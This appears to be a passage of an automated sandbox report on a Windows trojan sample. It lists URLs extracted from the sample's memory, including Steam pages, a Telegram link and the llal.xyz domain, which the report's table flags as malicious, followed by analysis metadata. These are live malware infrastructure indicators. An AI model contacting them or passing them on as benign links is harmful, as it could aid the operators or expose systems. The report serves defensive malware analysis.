                                                          http://store.steampowered.com/privacy_agreement/OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                            		high
                                                            https://store.steampowered.com/points/shop/OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                              		high
                                                              https://steamcommunity.com/profiles/76561199619938930tOXoeX1Ii3x.exe, 00000000.00000002.1870239685.0000000002FBE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&aOXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                  		high
                                                                  https://sketchfab.comOXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://lv.queniujq.cnOXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.youtube.com/OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://store.steampowered.com/privacy_agreement/OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                          		high
                                                                          https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=engOXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                            		high
                                                                            https://community.fastly.steamstatic.OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003031000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.000000000302E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://llal.xyz/OXoeX1Ii3x.exe, 00000000.00000002.1870239685.0000000003000000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&amOXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003031000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                		high
                                                                                https://www.google.com/recaptcha/OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://checkout.steampowered.com/OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://steamcommunity.com/6#OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.1870239685.0000000003000000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://llal.xyzOXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1693936827.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.1870379982.000000000302E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://store.steampowered.com/;OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://store.steampowered.com/about/76561199619938930[1].htm.0.drfalse
                                                                                          		high
                                                                                          https://llal.xyz/IOXoeX1Ii3x.exe, 00000000.00000002.1870239685.0000000003000000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://steamcommunity.com/my/wishlist/OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                            		high
                                                                                            https://steamcommunity.com/profiles/76561199619938930=OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                		high
                                                                                                https://steamcommunity.com/profiles/76561199619938930COXoeX1Ii3x.exe, 00000000.00000002.1870239685.0000000002FBE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://steamcommunity.com/profiles/765611996199389306OXoeX1Ii3x.exe, 00000000.00000002.1870239685.0000000002FBE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://help.steampowered.com/en/OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                      		high
                                                                                                      https://steamcommunity.com/market/OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                        		high
                                                                                                        https://store.steampowered.com/news/OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                          		high
                                                                                                          https://steamcommunity.com/profiles/76561199619938930-OXoeX1Ii3x.exe, 00000000.00000002.1870239685.0000000002FBE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842d$OXoeX1Ii3x.exe, 00000000.00000003.1693936827.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.1870379982.000000000302E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            http://store.steampowered.com/subscriber_agreement/OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                              		high
                                                                                                              https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgOXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                		high
                                                                                                                https://recaptcha.net/recaptcha/;OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://steamcommunity.com/discussions/OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                    		high
                                                                                                                    https://steamcommunity.com/profiles/76561199619938930/badgesOXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                      		high
                                                                                                                      https://store.steampowered.com/stats/OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                        		high
                                                                                                                        https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amOXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                          		high
                                                                                                                          https://medal.tvOXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://broadcast.st.dl.eccdnx.comOXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngOXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                		high
                                                                                                                                https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&aOXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                  		high
                                                                                                                                  https://store.steampowered.com/steam_refunds/OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                    		high
                                                                                                                                    https://steamcommunity.com/profiles/76561199619938930VOXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&aOXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                        		high
                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                          		high
                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=eOXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                            		high
                                                                                                                                            https://steamcommunity.com/workshop/OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                              		high
                                                                                                                                              https://login.steampowered.com/OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_cOXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                                  		high
                                                                                                                                                  https://store.steampowered.com/legal/OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                                    		high
                                                                                                                                                    https://steamcommunity.com/profiles/76561199619938930HOXoeX1Ii3x.exe, 00000000.00000002.1870239685.0000000002FBE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://community.fa4OXoeX1Ii3x.exe, 00000000.00000002.1870057539.0000000002CFC000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      		unknown
                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=enOXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003031000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                                        		high
                                                                                                                                                        https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=engOXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003031000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                                          		high
                                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&aOXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                                            		high
                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=englOXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                                              		high
                                                                                                                                                              https://recaptcha.netOXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://upx.sf.netAmcache.hve.3.drfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://store.steampowered.com/76561199619938930[1].htm.0.drfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=eOXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.pngOXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://127.0.0.1:27060OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199619938930[1].htm.0.drfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gifOXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQOXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&ampOXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://help.steampowered.com/OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://api.steampowered.com/OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      http://store.steampowered.com/account/cookiepreferences/OXoeX1Ii3x.exe, 00000000.00000003.1682119129.000000000301E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://https://t.me/asdfghjrrewqqqqtfg/ujs/WorldHellostrwvfncexGostrbrCHbrGkunknownftpac/Up/gltypeOXoeX1Ii3x.exefalse
                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        https://store.steampowered.com/mobileOXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://steamcommunity.com/76561199619938930[1].htm.0.drfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                                                                              		high

                                                                                                                                                                                              World Map of Contacted IPs

                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                                                              Public IPs

                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                              188.114.97.3
                                                                                                                                                                                              		llal.xyzEuropean Union
                                                                                                                                                                                              		13335CLOUDFLARENETUStrue
                                                                                                                                                                                              104.102.49.254
                                                                                                                                                                                              		steamcommunity.comUnited States
                                                                                                                                                                                              		16625AKAMAI-ASUSfalse

                                                                                                                                                                                              General Information

                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                              Analysis ID:1582973
                                                                                                                                                                                              Start date and time:2025-01-01 09:06:06 +01:00
                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                              Overall analysis duration:0h 4m 38s
                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                              Report type:full
                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                              Number of analysed new started processes analysed:8
                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                              Technologies:
                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                              Sample name:OXoeX1Ii3x.exe
                                                                                                                                                                                              renamed because original name is a hash value
                                                                                                                                                                                              Original Sample Name:3e9881b9c6ff4994fc9d684456694e77.exe
                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                              Classification:mal84.troj.winEXE@2/6@2/2
                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                                              • Number of executed functions: 9
                                                                                                                                                                                              • Number of non-executed functions: 85
                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                              • Found application associated with file extension: .exe

                                                                                                                                                                                              Warnings

                                                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 20.189.173.22, 20.190.159.68, 4.245.163.56, 13.107.246.45
